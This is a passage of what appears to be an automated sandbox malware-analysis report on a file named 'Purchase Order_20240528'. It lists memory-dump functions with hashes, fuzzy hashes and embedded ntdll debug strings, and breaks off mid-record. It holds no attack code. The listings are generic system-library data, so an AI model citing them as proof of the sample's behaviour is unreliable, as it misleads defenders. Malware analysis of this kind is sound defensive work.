                                  • Opcode ID: c22a6cdb42421cb57375658fd4533ff36e979905263ef960b424ad794445fd0e
                                  • Instruction ID: 8d8755636ef5e04d418c9f0916bed2be32761e68a0946823ef2f89fa17f25d84
                                  • Opcode Fuzzy Hash: c22a6cdb42421cb57375658fd4533ff36e979905263ef960b424ad794445fd0e
                                  • Instruction Fuzzy Hash: D790023160180402D10075584C08787001997D0302F55C111B9168655FC665C9927631
                                  Function 01622FB0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e288e87a111f8a3a945e6e2ba607dcd95682b60220314591e138816b351c4777
                                  • Instruction ID: 17efea7722245aa643fd2d8cf566122ccb8af1deffaf949c20be22f7e80bbd57
                                  • Opcode Fuzzy Hash: e288e87a111f8a3a945e6e2ba607dcd95682b60220314591e138816b351c4777
                                  • Instruction Fuzzy Hash: E1900221A0140042414075688C449474019BBE1211755C221B499C650EC55989666765
                                  Function 01622F90 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b69a2923e928832a0817bb81d41d1c68767be70b85ebeb72acfc1086a272725e
                                  • Instruction ID: 90cbecadbbb7e82bf8bab2c24fb1fdbbed182b87bcf429ed8183b634e67ca50d
                                  • Opcode Fuzzy Hash: b69a2923e928832a0817bb81d41d1c68767be70b85ebeb72acfc1086a272725e
                                  • Instruction Fuzzy Hash: 5590023160180402D10075584C1474B001997D0302F55C111B5168655EC62589527671
                                  Function 01622E30 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5354fa723196220c7754cf146bfe2f2cd1ebc38d802c3468f50df89873561ebb
                                  • Instruction ID: 673578c4cb118c7ed92ac34c754b4e2cfbadb0b056316898dbd71e16af735a00
                                  • Opcode Fuzzy Hash: 5354fa723196220c7754cf146bfe2f2cd1ebc38d802c3468f50df89873561ebb
                                  • Instruction Fuzzy Hash: 2790022170140402D10275584814647001DD7D1345F95C112F5428655EC6258A53B232
                                  Function 01622EE0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bf88ed5b962a9d10463eda1d53b7a2c0a4c2019ae51555b68d90659d8e7ab809
                                  • Instruction ID: 31e03e3c2f8351e93db5a5ce897fbd6ea6108adf852c194bf666d5f27f6dabe6
                                  • Opcode Fuzzy Hash: bf88ed5b962a9d10463eda1d53b7a2c0a4c2019ae51555b68d90659d8e7ab809
                                  • Instruction Fuzzy Hash: 4290026160180403D14079584C04647001997D0302F55C111B6068655FCA298D527235
                                  Function 01622EA0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11ff5feaede1f68f87c3c8e09a5837a0e3fdbf8e65cb54efa6585fe2274f31a0
                                  • Instruction ID: 76406eb8f64f35bc280264ff41e2467f18802094aaa8a3f8b99b65166c85b5fd
                                  • Opcode Fuzzy Hash: 11ff5feaede1f68f87c3c8e09a5837a0e3fdbf8e65cb54efa6585fe2274f31a0
                                  • Instruction Fuzzy Hash: DE90027160140402D14075584804787001997D0301F55C111B9068654FC6598ED67765
                                  Function 01622E80 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a3f3d5f5985cf13b91096d903eb750c27fc80627568db2b5f254e674924b088
                                  • Instruction ID: 21f9a2341c93cb785f6cacb1c3f6ae09ce67f25f9c03e6aba25cefaec2df2104
                                  • Opcode Fuzzy Hash: 0a3f3d5f5985cf13b91096d903eb750c27fc80627568db2b5f254e674924b088
                                  • Instruction Fuzzy Hash: B4900221A0140502D10175584804657001E97D0241F95C122B5028655FCA258A93B231
                                  Function 01623010 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1792beb5b98b42ff63d31e9e824d210af926f2d5c562059135edca718bedc5f4
                                  • Instruction ID: 24c80406cbf5189c170037a53bec3a52cbfba8de37d1f4205143288984db27ee
                                  • Opcode Fuzzy Hash: 1792beb5b98b42ff63d31e9e824d210af926f2d5c562059135edca718bedc5f4
                                  • Instruction Fuzzy Hash: AD90022160184442D14076584C04B4F411997E1202F95C119B815A654DC91589566721
                                  Function 01623090 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2417102436b5f4f97427c8cfe2520e0f18802ff83947b6f67326697f5802022a
                                  • Instruction ID: ddfa124eb22936ddc555bffbee4075f3f055ce91d7d7b7ed710aa780feeb9ca7
                                  • Opcode Fuzzy Hash: 2417102436b5f4f97427c8cfe2520e0f18802ff83947b6f67326697f5802022a
                                  • Instruction Fuzzy Hash: EE90022164140802D14075588814747001AD7D0601F55C111B4028654EC6168A6677B1
                                  Function 016239B0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b296c17c0f2578fd0cbe0841826ebe982c5c45dd217fbb5b90888ba20c9cb8d
                                  • Instruction ID: efe09fdd7cafd7f81256dab66ce4962bed382a49aaa1585a856e2a37f641b16e
                                  • Opcode Fuzzy Hash: 7b296c17c0f2578fd0cbe0841826ebe982c5c45dd217fbb5b90888ba20c9cb8d
                                  • Instruction Fuzzy Hash: E290022164545102D150755C48046574019B7E0201F55C121B4818694EC55589567321
                                  Function 01623D70 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27ebed3cc3c6b7b809a520367706dc48b1a60768ba181899274e3de09cc078a9
                                  • Instruction ID: 012acfd66690d32797e67ac1c0ba28a6882a05859764ee7102b033e05876f23f
                                  • Opcode Fuzzy Hash: 27ebed3cc3c6b7b809a520367706dc48b1a60768ba181899274e3de09cc078a9
                                  • Instruction Fuzzy Hash: 6690023560140402D51075585C04687005A97D0301F55D511B4428658EC65489A2B221
                                  Function 01623D10 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 811240d8e50a77dab454092a62b8bb06dfe0cbc3e027a3fcc8f9554fa7aac59e
                                  • Instruction ID: 371701308864b20497b3d9984e89a382189ef63d1f2ec91701451150d00d4faf
                                  • Opcode Fuzzy Hash: 811240d8e50a77dab454092a62b8bb06dfe0cbc3e027a3fcc8f9554fa7aac59e
                                  • Instruction Fuzzy Hash: C990023160240142954076585C04A8F411997E1302B95D515B4019654DC91489626321
                                  Function 01622C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: c7d9afe136069f0c68253de7c04ef4060bfab72a4479e3710ef4d3ba6b94f280
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Function 01622890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                                  • Instruction ID: d3c6df49288c10b7ef080d3bc8b1f898abe36b88b8b289dc30a0fa0998e97aaa
                                  • Opcode Fuzzy Hash: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                                  • Instruction Fuzzy Hash: 0651F7B6B00526BFCB21DB9D8CA097EFBB8BB48240B54826DF465D7641D374DE04CBA0
                                  Function 01692410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 324bfc72174669b4f618398fc257dbf04ed79adc03d14d42a2e77332e3665723
                                  • Instruction ID: 31a1762dbe1b06c98a7039b48fca7285e93d9210d66678904d50acd939e9a3e2
                                  • Opcode Fuzzy Hash: 324bfc72174669b4f618398fc257dbf04ed79adc03d14d42a2e77332e3665723
                                  • Instruction Fuzzy Hash: D151E2B5A00646BFCF34DF9DCDA097EBBFDAB44200B04846DE596D7682E774EA408760
                                  Function 016BA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: HEAP:
                                  • API String ID: 3446177414-2466845122
                                  • Opcode ID: 84be7cb3cdc1ecf358aefa0c3e049658163a609acd6ba99aa642b459cf7f8667
                                  • Instruction ID: e3794d092140565e3aff9fcc419b5156a765af333a8712dcd6a9b209437afd81
                                  • Opcode Fuzzy Hash: 84be7cb3cdc1ecf358aefa0c3e049658163a609acd6ba99aa642b459cf7f8667
                                  • Instruction Fuzzy Hash: 0DA1AC75A143128FD715CE68CCD4A6ABBE5BF88310F09456DEA46DB311EB30EC86CB91
                                  Function 01617630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016546FC
                                  • Execute=1, xrefs: 01654713
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01654725
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01654655
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01654787
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01654742
                                  • ExecuteOptions, xrefs: 016546A0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 0b35cf51ed66751b3858ac00014bd42a21666f700ef587026c10f314fddaa48c
                                  • Instruction ID: 1981ac7a04560acc87b59ce512cf86aee5810d4ad5dd66cb0b8a29404f7ff7ca
                                  • Opcode Fuzzy Hash: 0b35cf51ed66751b3858ac00014bd42a21666f700ef587026c10f314fddaa48c
                                  • Instruction Fuzzy Hash: AC512C31A0022ABAEF11AFA9DC95FBD77B9EF14700F0804DDD505AB285EB719A418F54
                                  Function 015FA250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 01647AE6
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016479FA
                                  • SsHd, xrefs: 015FA3E4
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016479D5
                                  • Actx , xrefs: 01647A0C, 01647A73
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 016479D0, 016479F5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                  • API String ID: 0-1988757188
                                  • Opcode ID: 33944770fe3bb794e261b184ee7a4574f1dd712d57e90aa492a6517e86b6abb7
                                  • Instruction ID: 1bdefb15e18437b7a228223c4f0019739ecd8c79a7d22ee3b92d7f9e82dea5c9
                                  • Opcode Fuzzy Hash: 33944770fe3bb794e261b184ee7a4574f1dd712d57e90aa492a6517e86b6abb7
                                  • Instruction Fuzzy Hash: 09E1C2706043428FE725CE28C898B6ABBE1BB84354F144A2DEA69CF3D1D731D985CB53
                                  Function 015FD770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0164936B
                                  • GsHd, xrefs: 015FD874
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01649346
                                  • Actx , xrefs: 01649508
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 01649341, 01649366
                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 01649565
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                  • API String ID: 3446177414-2196497285
                                  • Opcode ID: 81c34c3b587e35574ffe0b7664f269de8dd1b1b53d41173db5f09295bf1a2558
                                  • Instruction ID: fd56919ff30e4df91eb93b82542bfcb023546f46c733461664b9df3dd423c379
                                  • Opcode Fuzzy Hash: 81c34c3b587e35574ffe0b7664f269de8dd1b1b53d41173db5f09295bf1a2558
                                  • Instruction Fuzzy Hash: A3E1B2716043428FDB25CF98C980B6BBBF5BF89318F044A2DEA958F281D771D944CB92
                                  Function 0168F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                  • API String ID: 3446177414-1745908468
                                  • Opcode ID: 6da6a55e0593b76096857e83953e63ecd63894690d2d3153b86f861e5041fdf4
                                  • Instruction ID: 95b653ba489f176456f002eee2158e363daa7d359650e6002cf675b6659cc7fb
                                  • Opcode Fuzzy Hash: 6da6a55e0593b76096857e83953e63ecd63894690d2d3153b86f861e5041fdf4
                                  • Instruction Fuzzy Hash: 8E912131900686DFDB22EF68CC40AADBBF2FF59714F19829DE545AB351CB359881CB14
                                  Function 0165FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                  • API String ID: 3446177414-4227709934
                                  • Opcode ID: 4aa862a5196271d521e6ad8a78fa8c07fc92024ce2e545280de74be830a4393c
                                  • Instruction ID: d7f97bad46ef28367247bbe8f22ef0eb95d3eb225a78aca98f3cbb033fd014df
                                  • Opcode Fuzzy Hash: 4aa862a5196271d521e6ad8a78fa8c07fc92024ce2e545280de74be830a4393c
                                  • Instruction Fuzzy Hash: E6418AB5A01209ABDB51DF99CD80AEEBBB6BF48B04F140199ED04AB341D7719911DBA0
                                  Function 0168FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                  • API String ID: 3446177414-3492000579
                                  • Opcode ID: 1c00937ce617dd32a6acaa4c376a9c76d59469c061b98150b6372f4479c862e3
                                  • Instruction ID: 7e2447e96a08ea9553e68eb194547b896c2c63cedc90381acd9986a1464798ba
                                  • Opcode Fuzzy Hash: 1c00937ce617dd32a6acaa4c376a9c76d59469c061b98150b6372f4479c862e3
